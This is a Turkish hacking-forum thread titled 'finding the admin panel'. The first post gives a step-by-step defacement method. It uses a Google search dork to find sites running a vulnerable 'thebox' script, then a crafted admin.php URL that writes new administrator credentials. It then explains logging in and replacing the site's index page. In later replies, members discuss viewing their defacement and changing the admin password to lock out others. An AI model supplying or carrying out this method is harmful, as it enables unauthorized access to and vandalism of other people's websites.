admin panelini bulma

cakyone

Katılımcı Üye
15 Ocak 2009
361
0
İzmiR
herzamanki gibi googleye girip
inurl:thebox/thebox.php

yazıyoruz karşımıza çıkan sitelerin sonunda
/thebox/thebox.php vardır
sonra /thebox.php yi silip

/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111

bunu yapıştırıoruz ardından size
username:
Password:
isteyecektir
username ye
CLK-J35 yazıyoruz

password e ise
111 yazıoruz ve admin paneline girmiş oluyordur...
index atmak içinde
aşşaya doru inerken 2.click here ye tıklıyoruz

ve karşımıza edit page ler gelcek ordan bir tane sini seçip index imizin kodunu atıyoruz ve böylece index sayfaya yerleşmiş oluyor

her sayfada edit page bulamayabilirsinizz
yardımcı olabildiysem ne mutlu bna
Not:Her sitede olmaz arkadaşlar

Alıntıdır...

KaTiL-HacK

Yeni üye
12 Şub 2009
24
0
Bide sunu tam olarak bilmiyorum simdi indeximizi attik ve siteden ciktik ben linki yaziyorum ama siteye girmiyor attigim indexi gormek istiyorum:d yardimci olursaniz sevinirim

KaTiL-HacK

Yeni üye
12 Şub 2009
24
0
USTAD ONCE DAVRANSAK NE OLURKI :d ARDIMIZDAN KAC KISI GELIYO AYNI SITEYE 100 KERE iNDEX ATACAK DEILIZ ADMIN SIFRESINI DEGISEMEZMIYIZ??

cakyone

Katılımcı Üye
15 Ocak 2009
361
0
İzmiR
hmm onu tm olarak bilmiyorum ama değiştirebilirsin sanrıım ama siteler turkce olmadığı için biraz dil gerekli

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.